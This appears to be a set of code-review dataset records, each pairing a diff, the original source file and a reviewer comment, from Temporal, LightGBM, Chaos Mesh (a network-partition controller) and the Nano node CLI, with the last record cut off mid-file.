{ hostPort := c.GlobalString(FlagAddress) if hostPort == "" { hostPort = localHostPort } // Ignoring error as we'll fail to dial anyway, and that will produce a meaningful error host, _, _ := net.SplitHostPort(hostPort) certPath := c.GlobalString(FlagTLSCertPath) keyPath := c.GlobalString(FlagTLSKeyPath) caPath := c.GlobalString(FlagTLSCaPath) hostNameVerification := c.GlobalBool(FlagTLSEnableHostVerification) grpcSecurityOptions := grpc.WithInsecure() var cert *tls.Certificate var caPool *x509.CertPool if caPath != "" { caCertPool, err := fetchCACert(caPath) if err != nil { b.logger.Fatal("Failed to load server CA certificate", zap.Error(err)) return nil, err } caPool = caCertPool } if certPath != "" { myCert, err := tls.LoadX509KeyPair(certPath, keyPath) if err != nil { b.logger.Fatal("Failed to load client certificate", zap.Error(err)) return nil, err } cert = &myCert } // If we are given arguments to verify either server or client, configure TLS if caPool != nil || cert != nil { tlsConfig := auth.NewTLSConfigForServer(host, hostNameVerification) if caPool != nil { tlsConfig.RootCAs = caPool } if cert != nil { tlsConfig.Certificates = []tls.Certificate{*cert} } grpcSecurityOptions = grpc.WithTransportCredentials(credentials.NewTLS(tlsConfig)) } connection, err := grpc.Dial(hostPort, grpcSecurityOptions) if err != nil { b.logger.Fatal("Failed to create connection", zap.Error(err)) return nil, err } return connection, nil } func fetchCACert(path string) (*x509.CertPool, error) { caPool := x509.NewCertPool() caBytes, err := ioutil.ReadFile(path) if err != nil { return nil, err } if !caPool.AppendCertsFromPEM(caBytes) { return nil, errors.New("unknown failure constructing cert pool for ca") } return caPool, nil }
1
10,517
Nit: "Failed to configure TLS for SDK client"?
temporalio-temporal
go
@@ -89,7 +89,7 @@ def test_plot_split_value_histogram(params, breast_cancer_split, train_data): title='Histogram for feature @index/name@ @feature@', xlabel='x', ylabel='y', color='r') assert isinstance(ax1, matplotlib.axes.Axes) - title = 'Histogram for feature name {}'.format(gbm1.booster_.feature_name()[27]) + title = f'Histogram for feature name {gbm1.booster_.feature_name()[27]}' assert ax1.get_title() == title assert ax1.get_xlabel() == 'x' assert ax1.get_ylabel() == 'y'
1
# coding: utf-8 import pytest from sklearn.model_selection import train_test_split import lightgbm as lgb from lightgbm.compat import GRAPHVIZ_INSTALLED, MATPLOTLIB_INSTALLED if MATPLOTLIB_INSTALLED: import matplotlib matplotlib.use('Agg') if GRAPHVIZ_INSTALLED: import graphviz from .utils import load_breast_cancer @pytest.fixture(scope="module") def breast_cancer_split(): return train_test_split(*load_breast_cancer(return_X_y=True), test_size=0.1, random_state=1) @pytest.fixture(scope="module") def train_data(breast_cancer_split): X_train, _, y_train, _ = breast_cancer_split return lgb.Dataset(X_train, y_train) @pytest.fixture def params(): return {"objective": "binary", "verbose": -1, "num_leaves": 3} @pytest.mark.skipif(not MATPLOTLIB_INSTALLED, reason='matplotlib is not installed') def test_plot_importance(params, breast_cancer_split, train_data): X_train, _, y_train, _ = breast_cancer_split gbm0 = lgb.train(params, train_data, num_boost_round=10) ax0 = lgb.plot_importance(gbm0) assert isinstance(ax0, matplotlib.axes.Axes) assert ax0.get_title() == 'Feature importance' assert ax0.get_xlabel() == 'Feature importance' assert ax0.get_ylabel() == 'Features' assert len(ax0.patches) <= 30 gbm1 = lgb.LGBMClassifier(n_estimators=10, num_leaves=3, silent=True) gbm1.fit(X_train, y_train) ax1 = lgb.plot_importance(gbm1, color='r', title='t', xlabel='x', ylabel='y') assert isinstance(ax1, matplotlib.axes.Axes) assert ax1.get_title() == 't' assert ax1.get_xlabel() == 'x' assert ax1.get_ylabel() == 'y' assert len(ax1.patches) <= 30 for patch in ax1.patches: assert patch.get_facecolor() == (1., 0, 0, 1.) # red ax2 = lgb.plot_importance(gbm0, color=['r', 'y', 'g', 'b'], title=None, xlabel=None, ylabel=None) assert isinstance(ax2, matplotlib.axes.Axes) assert ax2.get_title() == '' assert ax2.get_xlabel() == '' assert ax2.get_ylabel() == '' assert len(ax2.patches) <= 30 assert ax2.patches[0].get_facecolor() == (1., 0, 0, 1.) # r assert ax2.patches[1].get_facecolor() == (.75, .75, 0, 1.) # y assert ax2.patches[2].get_facecolor() == (0, .5, 0, 1.) # g assert ax2.patches[3].get_facecolor() == (0, 0, 1., 1.) # b @pytest.mark.skipif(not MATPLOTLIB_INSTALLED, reason='matplotlib is not installed') def test_plot_split_value_histogram(params, breast_cancer_split, train_data): X_train, _, y_train, _ = breast_cancer_split gbm0 = lgb.train(params, train_data, num_boost_round=10) ax0 = lgb.plot_split_value_histogram(gbm0, 27) assert isinstance(ax0, matplotlib.axes.Axes) assert ax0.get_title() == 'Split value histogram for feature with index 27' assert ax0.get_xlabel() == 'Feature split value' assert ax0.get_ylabel() == 'Count' assert len(ax0.patches) <= 2 gbm1 = lgb.LGBMClassifier(n_estimators=10, num_leaves=3, silent=True) gbm1.fit(X_train, y_train) ax1 = lgb.plot_split_value_histogram(gbm1, gbm1.booster_.feature_name()[27], figsize=(10, 5), title='Histogram for feature @index/name@ @feature@', xlabel='x', ylabel='y', color='r') assert isinstance(ax1, matplotlib.axes.Axes) title = 'Histogram for feature name {}'.format(gbm1.booster_.feature_name()[27]) assert ax1.get_title() == title assert ax1.get_xlabel() == 'x' assert ax1.get_ylabel() == 'y' assert len(ax1.patches) <= 2 for patch in ax1.patches: assert patch.get_facecolor() == (1., 0, 0, 1.) # red ax2 = lgb.plot_split_value_histogram(gbm0, 27, bins=10, color=['r', 'y', 'g', 'b'], title=None, xlabel=None, ylabel=None) assert isinstance(ax2, matplotlib.axes.Axes) assert ax2.get_title() == '' assert ax2.get_xlabel() == '' assert ax2.get_ylabel() == '' assert len(ax2.patches) == 10 assert ax2.patches[0].get_facecolor() == (1., 0, 0, 1.) # r assert ax2.patches[1].get_facecolor() == (.75, .75, 0, 1.) # y assert ax2.patches[2].get_facecolor() == (0, .5, 0, 1.) # g assert ax2.patches[3].get_facecolor() == (0, 0, 1., 1.) # b with pytest.raises(ValueError): lgb.plot_split_value_histogram(gbm0, 0) # was not used in splitting @pytest.mark.skipif(not MATPLOTLIB_INSTALLED or not GRAPHVIZ_INSTALLED, reason='matplotlib or graphviz is not installed') def test_plot_tree(breast_cancer_split): X_train, _, y_train, _ = breast_cancer_split gbm = lgb.LGBMClassifier(n_estimators=10, num_leaves=3, silent=True) gbm.fit(X_train, y_train, verbose=False) with pytest.raises(IndexError): lgb.plot_tree(gbm, tree_index=83) ax = lgb.plot_tree(gbm, tree_index=3, figsize=(15, 8), show_info=['split_gain']) assert isinstance(ax, matplotlib.axes.Axes) w, h = ax.axes.get_figure().get_size_inches() assert int(w) == 15 assert int(h) == 8 @pytest.mark.skipif(not GRAPHVIZ_INSTALLED, reason='graphviz is not installed') def test_create_tree_digraph(breast_cancer_split): X_train, _, y_train, _ = breast_cancer_split constraints = [-1, 1] * int(X_train.shape[1] / 2) gbm = lgb.LGBMClassifier(n_estimators=10, num_leaves=3, silent=True, monotone_constraints=constraints) gbm.fit(X_train, y_train, verbose=False) with pytest.raises(IndexError): lgb.create_tree_digraph(gbm, tree_index=83) graph = lgb.create_tree_digraph(gbm, tree_index=3, show_info=['split_gain', 'internal_value', 'internal_weight'], name='Tree4', node_attr={'color': 'red'}) graph.render(view=False) assert isinstance(graph, graphviz.Digraph) assert graph.name == 'Tree4' assert graph.filename == 'Tree4.gv' assert len(graph.node_attr) == 1 assert graph.node_attr['color'] == 'red' assert len(graph.graph_attr) == 0 assert len(graph.edge_attr) == 0 graph_body = ''.join(graph.body) assert 'leaf' in graph_body assert 'gain' in graph_body assert 'value' in graph_body assert 'weight' in graph_body assert '#ffdddd' in graph_body assert '#ddffdd' in graph_body assert 'data' not in graph_body assert 'count' not in graph_body @pytest.mark.skipif(not MATPLOTLIB_INSTALLED, reason='matplotlib is not installed') def test_plot_metrics(params, breast_cancer_split, train_data): X_train, X_test, y_train, y_test = breast_cancer_split test_data = lgb.Dataset(X_test, y_test, reference=train_data) params.update({"metric": {"binary_logloss", "binary_error"}}) evals_result0 = {} lgb.train(params, train_data, valid_sets=[train_data, test_data], valid_names=['v1', 'v2'], num_boost_round=10, evals_result=evals_result0, verbose_eval=False) ax0 = lgb.plot_metric(evals_result0) assert isinstance(ax0, matplotlib.axes.Axes) assert ax0.get_title() == 'Metric during training' assert ax0.get_xlabel() == 'Iterations' assert ax0.get_ylabel() in {'binary_logloss', 'binary_error'} ax0 = lgb.plot_metric(evals_result0, metric='binary_error') ax0 = lgb.plot_metric(evals_result0, metric='binary_logloss', dataset_names=['v2']) evals_result1 = {} lgb.train(params, train_data, num_boost_round=10, evals_result=evals_result1, verbose_eval=False) with pytest.raises(ValueError): lgb.plot_metric(evals_result1) gbm2 = lgb.LGBMClassifier(n_estimators=10, num_leaves=3, silent=True) gbm2.fit(X_train, y_train, eval_set=[(X_test, y_test)], verbose=False) ax2 = lgb.plot_metric(gbm2, title=None, xlabel=None, ylabel=None) assert isinstance(ax2, matplotlib.axes.Axes) assert ax2.get_title() == '' assert ax2.get_xlabel() == '' assert ax2.get_ylabel() == ''
1
30,659
please update your branch to the latest `master`. This change was already made in #4359
microsoft-LightGBM
cpp
@@ -18,6 +18,8 @@ import ( "crypto/sha1" "errors" "fmt" + "github.com/pingcap/chaos-mesh/controllers" + "time" "golang.org/x/sync/errgroup"
1
// Copyright 2019 PingCAP, Inc. // // Licensed under the Apache License, Version 2.0 (the "License"); // you may not use this file except in compliance with the License. // You may obtain a copy of the License at // // http://www.apache.org/licenses/LICENSE-2.0 // // Unless required by applicable law or agreed to in writing, software // distributed under the License is distributed on an "AS IS" BASIS, // See the License for the specific language governing permissions and // limitations under the License. package partition import ( "context" "crypto/sha1" "errors" "fmt" "golang.org/x/sync/errgroup" "github.com/go-logr/logr" "github.com/pingcap/chaos-mesh/api/v1alpha1" "github.com/pingcap/chaos-mesh/controllers/twophase" pb "github.com/pingcap/chaos-mesh/pkg/chaosdaemon/pb" "github.com/pingcap/chaos-mesh/pkg/utils" v1 "k8s.io/api/core/v1" k8sError "k8s.io/apimachinery/pkg/api/errors" "k8s.io/apimachinery/pkg/types" "k8s.io/client-go/tools/cache" ctrl "sigs.k8s.io/controller-runtime" "sigs.k8s.io/controller-runtime/pkg/client" ) const ( networkPartitionActionMsg = "part network for %s" sourceIpSetPostFix = "src" targetIpSetPostFix = "tgt" ) func NewReconciler(c client.Client, log logr.Logger, req ctrl.Request) twophase.Reconciler { return twophase.Reconciler{ InnerReconciler: &Reconciler{ Client: c, Log: log, }, Client: c, Log: log, } } type Reconciler struct { client.Client Log logr.Logger } func (r *Reconciler) Object() twophase.InnerObject { return &v1alpha1.NetworkChaos{} } // Apply is a functions used to apply partition chaos. func (r *Reconciler) Apply(ctx context.Context, req ctrl.Request, chaos twophase.InnerObject) error { r.Log.Info("applying network partition") networkchaos, ok := chaos.(*v1alpha1.NetworkChaos) if !ok { err := errors.New("chaos is not NetworkChaos") r.Log.Error(err, "chaos is not NetworkChaos", "chaos", chaos) return err } sources, err := utils.SelectAndGeneratePods(ctx, r.Client, &networkchaos.Spec) if err != nil { r.Log.Error(err, "failed to select and generate pods") return err } targets, err := utils.SelectAndGeneratePods(ctx, r.Client, &networkchaos.Spec.Target) if err != nil { r.Log.Error(err, "failed to select and generate pods") return err } sourceSet := r.generateSet(sources, networkchaos, sourceIpSetPostFix) targetSet := r.generateSet(targets, networkchaos, targetIpSetPostFix) allPods := append(sources, targets...) // Set up ipset in every related pods g := errgroup.Group{} for index := range allPods { pod := allPods[index] r.Log.Info("PODS", "name", pod.Name, "namespace", pod.Namespace) g.Go(func() error { err := r.flushPodIPSet(ctx, &pod, sourceSet, networkchaos) if err != nil { return err } r.Log.Info("flush ipset on pod", "name", pod.Name, "namespace", pod.Namespace) return r.flushPodIPSet(ctx, &pod, targetSet, networkchaos) }) } if err = g.Wait(); err != nil { r.Log.Error(err, "flush pod ipset error") return err } if networkchaos.Spec.Direction == v1alpha1.To || networkchaos.Spec.Direction == v1alpha1.Both { if err := r.BlockSet(ctx, sources, targetSet, pb.Rule_OUTPUT, networkchaos); err != nil { r.Log.Error(err, "set source iptables failed") return err } if err := r.BlockSet(ctx, targets, sourceSet, pb.Rule_INPUT, networkchaos); err != nil { r.Log.Error(err, "set target iptables failed") return err } } if networkchaos.Spec.Direction == v1alpha1.From || networkchaos.Spec.Direction == v1alpha1.Both { if err := r.BlockSet(ctx, sources, targetSet, pb.Rule_INPUT, networkchaos); err != nil { r.Log.Error(err, "set source iptables failed") return err } if err := r.BlockSet(ctx, targets, sourceSet, pb.Rule_OUTPUT, networkchaos); err != nil { r.Log.Error(err, "set target iptables failed") return err } } networkchaos.Status.Experiment.Pods = []v1alpha1.PodStatus{} for _, pod := range allPods { ps := v1alpha1.PodStatus{ Namespace: pod.Namespace, Name: pod.Name, HostIP: pod.Status.HostIP, PodIP: pod.Status.PodIP, Action: string(networkchaos.Spec.Action), Message: fmt.Sprintf(networkPartitionActionMsg, *networkchaos.Spec.Duration), } networkchaos.Status.Experiment.Pods = append(networkchaos.Status.Experiment.Pods, ps) } return nil } func (r *Reconciler) BlockSet(ctx context.Context, pods []v1.Pod, set pb.IpSet, direction pb.Rule_Direction, networkchaos *v1alpha1.NetworkChaos) error { g := errgroup.Group{} sourceRule := r.generateIPTables(pb.Rule_ADD, direction, set.Name) for index := range pods { pod := &pods[index] key, err := cache.MetaNamespaceKeyFunc(pod) if err != nil { return err } switch direction { case pb.Rule_INPUT: networkchaos.Finalizers = utils.InsertFinalizer(networkchaos.Finalizers, "input-"+key) case pb.Rule_OUTPUT: networkchaos.Finalizers = utils.InsertFinalizer(networkchaos.Finalizers, "output"+key) } g.Go(func() error { return r.sendIPTables(ctx, pod, sourceRule, networkchaos) }) } return g.Wait() } func (r *Reconciler) Recover(ctx context.Context, req ctrl.Request, chaos twophase.InnerObject) error { networkchaos, ok := chaos.(*v1alpha1.NetworkChaos) if !ok { err := errors.New("chaos is not NetworkChaos") r.Log.Error(err, "chaos is not NetworkChaos", "chaos", chaos) return err } err := r.cleanFinalizersAndRecover(ctx, networkchaos) if err != nil { r.Log.Error(err, "cleanFinalizersAndRecover failed") return err } return nil } func (r *Reconciler) generateSetName(networkchaos *v1alpha1.NetworkChaos, namePostFix string) string { r.Log.Info("generating name for chaos", "name", networkchaos.Name) originalName := networkchaos.Name var ipsetName string if len(originalName) < 6 { ipsetName = originalName + "_" + namePostFix } else { namePrefix := originalName[0:5] nameRest := originalName[5:] hasher := sha1.New() hasher.Write([]byte(nameRest)) hashValue := fmt.Sprintf("%x", hasher.Sum(nil)) // keep the length does not exceed 27 ipsetName = namePrefix + "_" + hashValue[0:17] + "_" + namePostFix } r.Log.Info("name generated", "ipsetName", ipsetName) return ipsetName } func (r *Reconciler) generateSet(pods []v1.Pod, networkchaos *v1alpha1.NetworkChaos, namePostFix string) pb.IpSet { name := r.generateSetName(networkchaos, namePostFix) ips := make([]string, 0, len(pods)) for _, pod := range pods { if len(pod.Status.PodIP) > 0 { ips = append(ips, pod.Status.PodIP) } } r.Log.Info("creating ipset", "name", name, "ips", ips) return pb.IpSet{ Name: name, Ips: ips, } } func (r *Reconciler) generateIPTables(action pb.Rule_Action, direction pb.Rule_Direction, set string) pb.Rule { return pb.Rule{ Action: action, Direction: direction, Set: set, } } func (r *Reconciler) cleanFinalizersAndRecover(ctx context.Context, networkchaos *v1alpha1.NetworkChaos) error { if len(networkchaos.Finalizers) == 0 { return nil } for _, key := range networkchaos.Finalizers { direction := key[0:6] podKey := key[6:] ns, name, err := cache.SplitMetaNamespaceKey(podKey) if err != nil { return err } var pod v1.Pod err = r.Get(ctx, types.NamespacedName{ Namespace: ns, Name: name, }, &pod) if err != nil { if !k8sError.IsNotFound(err) { return err } r.Log.Info("Pod not found", "namespace", ns, "name", name) networkchaos.Finalizers = utils.RemoveFromFinalizer(networkchaos.Finalizers, key) continue } var rule pb.Rule if networkchaos.Spec.Direction != v1alpha1.From { switch direction { case "output": set := r.generateSetName(networkchaos, targetIpSetPostFix) rule = r.generateIPTables(pb.Rule_DELETE, pb.Rule_OUTPUT, set) case "input-": set := r.generateSetName(networkchaos, sourceIpSetPostFix) rule = r.generateIPTables(pb.Rule_DELETE, pb.Rule_INPUT, set) } err = r.sendIPTables(ctx, &pod, rule, networkchaos) if err != nil { r.Log.Error(err, "error while deleting iptables rules") return err } } if networkchaos.Spec.Direction != v1alpha1.To { switch direction { case "output": set := r.generateSetName(networkchaos, sourceIpSetPostFix) rule = r.generateIPTables(pb.Rule_DELETE, pb.Rule_OUTPUT, set) case "input-": set := r.generateSetName(networkchaos, targetIpSetPostFix) rule = r.generateIPTables(pb.Rule_DELETE, pb.Rule_INPUT, set) } err = r.sendIPTables(ctx, &pod, rule, networkchaos) if err != nil { r.Log.Error(err, "error while deleting iptables rules") return err } } networkchaos.Finalizers = utils.RemoveFromFinalizer(networkchaos.Finalizers, key) } r.Log.Info("after recovering", "finalizers", networkchaos.Finalizers) return nil } func (r *Reconciler) flushPodIPSet(ctx context.Context, pod *v1.Pod, ipset pb.IpSet, networkchaos *v1alpha1.NetworkChaos) error { c, err := utils.CreateGrpcConnection(ctx, r.Client, pod) if err != nil { return err } defer c.Close() pbClient := pb.NewChaosDaemonClient(c) if len(pod.Status.ContainerStatuses) == 0 { return fmt.Errorf("%s %s can't get the state of container", pod.Namespace, pod.Name) } containerID := pod.Status.ContainerStatuses[0].ContainerID _, err = pbClient.FlushIpSet(ctx, &pb.IpSetRequest{ Ipset: &ipset, ContainerId: containerID, }) return err } func (r *Reconciler) sendIPTables(ctx context.Context, pod *v1.Pod, rule pb.Rule, networkchaos *v1alpha1.NetworkChaos) error { c, err := utils.CreateGrpcConnection(ctx, r.Client, pod) if err != nil { return err } defer c.Close() pbClient := pb.NewChaosDaemonClient(c) if len(pod.Status.ContainerStatuses) == 0 { return fmt.Errorf("%s %s can't get the state of container", pod.Namespace, pod.Name) } containerID := pod.Status.ContainerStatuses[0].ContainerID _, err = pbClient.FlushIptables(ctx, &pb.IpTablesRequest{ Rule: &rule, ContainerId: containerID, }) return err }
1
13,040
This line should be formatted
chaos-mesh-chaos-mesh
go
@@ -32,6 +32,9 @@ int main (int argc, char * const * argv) ("disable_unchecked_drop", "Disables drop of unchecked table at startup") ("fast_bootstrap", "Increase bootstrap speed for high end nodes with higher limits") ("batch_size",boost::program_options::value<std::size_t> (), "Increase sideband batch size, default 512") + ("block_processor_batch_size",boost::program_options::value<std::size_t> (), "Increase block processor transaction batch write size, default 0 (limited by config block_processor_batch_max_time)") + ("block_processor_full_size",boost::program_options::value<std::size_t> (), "Increase block processor allowed blocks queue size before dropping live network packets and holding bootstrap download, default 65536") + ("block_processor_verification_size",boost::program_options::value<std::size_t> (), "Increase batch signature verification size in block processor, default 0 (2048 * signature checker threads + 1)") ("debug_block_count", "Display the number of block") ("debug_bootstrap_generate", "Generate bootstrap sequence of blocks") ("debug_dump_online_weight", "Dump online_weights table")
1
#include <nano/lib/utility.hpp> #include <nano/nano_node/daemon.hpp> #include <nano/node/cli.hpp> #include <nano/node/node.hpp> #include <nano/node/rpc.hpp> #include <nano/node/testing.hpp> #include <sstream> #include <argon2.h> #include <boost/lexical_cast.hpp> #include <boost/program_options.hpp> int main (int argc, char * const * argv) { nano::set_umask (); boost::program_options::options_description description ("Command line options"); nano::add_node_options (description); // clang-format off description.add_options () ("help", "Print out options") ("version", "Prints out version") ("daemon", "Start node daemon") ("disable_backup", "Disable wallet automatic backups") ("disable_lazy_bootstrap", "Disables lazy bootstrap") ("disable_legacy_bootstrap", "Disables legacy bootstrap") ("disable_wallet_bootstrap", "Disables wallet lazy bootstrap") ("disable_bootstrap_listener", "Disables bootstrap listener (incoming connections)") ("disable_unchecked_cleanup", "Disables periodic cleanup of old records from unchecked table") ("disable_unchecked_drop", "Disables drop of unchecked table at startup") ("fast_bootstrap", "Increase bootstrap speed for high end nodes with higher limits") ("batch_size",boost::program_options::value<std::size_t> (), "Increase sideband batch size, default 512") ("debug_block_count", "Display the number of block") ("debug_bootstrap_generate", "Generate bootstrap sequence of blocks") ("debug_dump_online_weight", "Dump online_weights table") ("debug_dump_representatives", "List representatives and weights") ("debug_account_count", "Display the number of accounts") ("debug_mass_activity", "Generates fake debug activity") ("debug_profile_generate", "Profile work generation") ("debug_opencl", "OpenCL work generation") ("debug_profile_verify", "Profile work verification") ("debug_profile_kdf", "Profile kdf function") ("debug_verify_profile", "Profile signature verification") ("debug_verify_profile_batch", "Profile batch signature verification") ("debug_profile_bootstrap", "Profile bootstrap style blocks processing (at least 10GB of free storage space required)") ("debug_profile_sign", "Profile signature generation") ("debug_profile_process", "Profile active blocks processing (only for nano_test_network)") ("debug_profile_votes", "Profile votes processing (only for nano_test_network)") ("debug_random_feed", "Generates output to RNG test suites") ("debug_rpc", "Read an RPC command from stdin and invoke it. Network operations will have no effect.") ("debug_validate_blocks", "Check all blocks for correct hash, signature, work value") ("debug_peers", "Display peer IPv6:port connections") ("platform", boost::program_options::value<std::string> (), "Defines the <platform> for OpenCL commands") ("device", boost::program_options::value<std::string> (), "Defines <device> for OpenCL command") ("threads", boost::program_options::value<std::string> (), "Defines <threads> count for OpenCL command") ("difficulty", boost::program_options::value<std::string> (), "Defines <difficulty> for OpenCL command, HEX"); // clang-format on boost::program_options::variables_map vm; try { boost::program_options::store (boost::program_options::parse_command_line (argc, argv, description), vm); } catch (boost::program_options::error const & err) { std::cerr << err.what () << std::endl; return 1; } boost::program_options::notify (vm); int result (0); auto network (vm.find ("network")); if (network != vm.end ()) { auto err (nano::network_params::set_active_network (network->second.as<std::string> ())); if (err) { std::cerr << err.get_message () << std::endl; std::exit (1); } } auto data_path_it = vm.find ("data_path"); if (data_path_it == vm.end ()) { std::string error_string; if (!nano::migrate_working_path (error_string)) { std::cerr << error_string << std::endl; return 1; } } boost::filesystem::path data_path ((data_path_it != vm.end ()) ? data_path_it->second.as<std::string> () : nano::working_path ()); auto ec = nano::handle_node_options (vm); if (ec == nano::error_cli::unknown_command) { if (vm.count ("daemon") > 0) { nano_daemon::daemon daemon; nano::node_flags flags; auto batch_size_it = vm.find ("batch_size"); if (batch_size_it != vm.end ()) { flags.sideband_batch_size = batch_size_it->second.as<size_t> (); } flags.disable_backup = (vm.count ("disable_backup") > 0); flags.disable_lazy_bootstrap = (vm.count ("disable_lazy_bootstrap") > 0); flags.disable_legacy_bootstrap = (vm.count ("disable_legacy_bootstrap") > 0); flags.disable_wallet_bootstrap = (vm.count ("disable_wallet_bootstrap") > 0); flags.disable_bootstrap_listener = (vm.count ("disable_bootstrap_listener") > 0); flags.disable_unchecked_cleanup = (vm.count ("disable_unchecked_cleanup") > 0); flags.disable_unchecked_drop = (vm.count ("disable_unchecked_drop") > 0); flags.fast_bootstrap = (vm.count ("fast_bootstrap") > 0); daemon.run (data_path, flags); } else if (vm.count ("debug_block_count")) { nano::inactive_node node (data_path); auto transaction (node.node->store.tx_begin ()); std::cout << boost::str (boost::format ("Block count: %1%\n") % node.node->store.block_count (transaction).sum ()); } else if (vm.count ("debug_bootstrap_generate")) { auto key_it = vm.find ("key"); if (key_it != vm.end ()) { nano::uint256_union key; if (!key.decode_hex (key_it->second.as<std::string> ())) { nano::keypair genesis (key.to_string ()); nano::work_pool work (std::numeric_limits<unsigned>::max (), nullptr); std::cout << "Genesis: " << genesis.prv.data.to_string () << "\n" << "Public: " << genesis.pub.to_string () << "\n" << "Account: " << genesis.pub.to_account () << "\n"; nano::keypair landing; std::cout << "Landing: " << landing.prv.data.to_string () << "\n" << "Public: " << landing.pub.to_string () << "\n" << "Account: " << landing.pub.to_account () << "\n"; for (auto i (0); i != 32; ++i) { nano::keypair rep; std::cout << "Rep" << i << ": " << rep.prv.data.to_string () << "\n" << "Public: " << rep.pub.to_string () << "\n" << "Account: " << rep.pub.to_account () << "\n"; } nano::uint128_t balance (std::numeric_limits<nano::uint128_t>::max ()); nano::open_block genesis_block (genesis.pub, genesis.pub, genesis.pub, genesis.prv, genesis.pub, work.generate (genesis.pub)); std::cout << genesis_block.to_json (); std::cout.flush (); nano::block_hash previous (genesis_block.hash ()); for (auto i (0); i != 8; ++i) { nano::uint128_t yearly_distribution (nano::uint128_t (1) << (127 - (i == 7 ? 6 : i))); auto weekly_distribution (yearly_distribution / 52); for (auto j (0); j != 52; ++j) { assert (balance > weekly_distribution); balance = balance < (weekly_distribution * 2) ? 0 : balance - weekly_distribution; nano::send_block send (previous, landing.pub, balance, genesis.prv, genesis.pub, work.generate (previous)); previous = send.hash (); std::cout << send.to_json (); std::cout.flush (); } } } else { std::cerr << "Invalid key\n"; result = -1; } } else { std::cerr << "Bootstrapping requires one <key> option\n"; result = -1; } } else if (vm.count ("debug_dump_online_weight")) { nano::inactive_node node (data_path); auto current (node.node->online_reps.online_stake ()); std::cout << boost::str (boost::format ("Online Weight %1%\n") % current); auto transaction (node.node->store.tx_begin_read ()); for (auto i (node.node->store.online_weight_begin (transaction)), n (node.node->store.online_weight_end ()); i != n; ++i) { using time_point = std::chrono::system_clock::time_point; time_point ts (std::chrono::duration_cast<time_point::duration> (std::chrono::nanoseconds (i->first))); std::time_t timestamp = std::chrono::system_clock::to_time_t (ts); std::string weight; i->second.encode_dec (weight); std::cout << boost::str (boost::format ("Timestamp %1% Weight %2%\n") % ctime (&timestamp) % weight); } } else if (vm.count ("debug_dump_representatives")) { nano::inactive_node node (data_path); auto transaction (node.node->store.tx_begin ()); nano::uint128_t total; for (auto i (node.node->store.representation_begin (transaction)), n (node.node->store.representation_end ()); i != n; ++i) { nano::account account (i->first); auto amount (node.node->store.representation_get (transaction, account)); total += amount; std::cout << boost::str (boost::format ("%1% %2% %3%\n") % account.to_account () % amount.convert_to<std::string> () % total.convert_to<std::string> ()); } std::map<nano::account, nano::uint128_t> calculated; for (auto i (node.node->store.latest_begin (transaction)), n (node.node->store.latest_end ()); i != n; ++i) { nano::account_info info (i->second); nano::block_hash rep_block (node.node->ledger.representative_calculated (transaction, info.head)); auto block (node.node->store.block_get (transaction, rep_block)); calculated[block->representative ()] += info.balance.number (); } total = 0; for (auto i (calculated.begin ()), n (calculated.end ()); i != n; ++i) { total += i->second; std::cout << boost::str (boost::format ("%1% %2% %3%\n") % i->first.to_account () % i->second.convert_to<std::string> () % total.convert_to<std::string> ()); } } else if (vm.count ("debug_account_count")) { nano::inactive_node node (data_path); auto transaction (node.node->store.tx_begin ()); std::cout << boost::str (boost::format ("Frontier count: %1%\n") % node.node->store.account_count (transaction)); } else if (vm.count ("debug_mass_activity")) { nano::system system (24000, 1); uint32_t count (1000000); system.generate_mass_activity (count, *system.nodes[0]); } else if (vm.count ("debug_profile_kdf")) { nano::network_params network_params; nano::uint256_union result; nano::uint256_union salt (0); std::string password (""); while (true) { auto begin1 (std::chrono::high_resolution_clock::now ()); auto success (argon2_hash (1, network_params.kdf_work, 1, password.data (), password.size (), salt.bytes.data (), salt.bytes.size (), result.bytes.data (), result.bytes.size (), NULL, 0, Argon2_d, 0x10)); (void)success; auto end1 (std::chrono::high_resolution_clock::now ()); std::cerr << boost::str (boost::format ("Derivation time: %1%us\n") % std::chrono::duration_cast<std::chrono::microseconds> (end1 - begin1).count ()); } } else if (vm.count ("debug_profile_generate")) { nano::work_pool work (std::numeric_limits<unsigned>::max (), nullptr); nano::change_block block (0, 0, nano::keypair ().prv, 0, 0); std::cerr << "Starting generation profiling\n"; while (true) { block.hashables.previous.qwords[0] += 1; auto begin1 (std::chrono::high_resolution_clock::now ()); block.block_work_set (work.generate (block.root ())); auto end1 (std::chrono::high_resolution_clock::now ()); std::cerr << boost::str (boost::format ("%|1$ 12d|\n") % std::chrono::duration_cast<std::chrono::microseconds> (end1 - begin1).count ()); } } else if (vm.count ("debug_opencl")) { nano::network_params network_params; bool error (false); nano::opencl_environment environment (error); if (!error) { unsigned short platform (0); auto platform_it = vm.find ("platform"); if (platform_it != vm.end ()) { try { platform = boost::lexical_cast<unsigned short> (platform_it->second.as<std::string> ()); } catch (boost::bad_lexical_cast &) { std::cerr << "Invalid platform id\n"; result = -1; } } unsigned short device (0); auto device_it = vm.find ("device"); if (device_it != vm.end ()) { try { device = boost::lexical_cast<unsigned short> (device_it->second.as<std::string> ()); } catch (boost::bad_lexical_cast &) { std::cerr << "Invalid device id\n"; result = -1; } } unsigned threads (1024 * 1024); auto threads_it = vm.find ("threads"); if (threads_it != vm.end ()) { try { threads = boost::lexical_cast<unsigned> (threads_it->second.as<std::string> ()); } catch (boost::bad_lexical_cast &) { std::cerr << "Invalid threads count\n"; result = -1; } } uint64_t difficulty (network_params.publish_threshold); auto difficulty_it = vm.find ("difficulty"); if (difficulty_it != vm.end ()) { if (nano::from_string_hex (difficulty_it->second.as<std::string> (), difficulty)) { std::cerr << "Invalid difficulty\n"; result = -1; } } if (!result) { error |= platform >= environment.platforms.size (); if (!error) { error |= device >= environment.platforms[platform].devices.size (); if (!error) { nano::logging logging; auto opencl (nano::opencl_work::create (true, { platform, device, threads }, logging)); nano::work_pool work_pool (std::numeric_limits<unsigned>::max (), opencl ? [&opencl](nano::uint256_union const & root_a, uint64_t difficulty_a) { return opencl->generate_work (root_a, difficulty_a); } : std::function<boost::optional<uint64_t> (nano::uint256_union const &, uint64_t)> (nullptr)); nano::change_block block (0, 0, nano::keypair ().prv, 0, 0); std::cerr << boost::str (boost::format ("Starting OpenCL generation profiling. Platform: %1%. Device: %2%. Threads: %3%. Difficulty: %4$#x\n") % platform % device % threads % difficulty); for (uint64_t i (0); true; ++i) { block.hashables.previous.qwords[0] += 1; auto begin1 (std::chrono::high_resolution_clock::now ()); block.block_work_set (work_pool.generate (block.root (), difficulty)); auto end1 (std::chrono::high_resolution_clock::now ()); std::cerr << boost::str (boost::format ("%|1$ 12d|\n") % 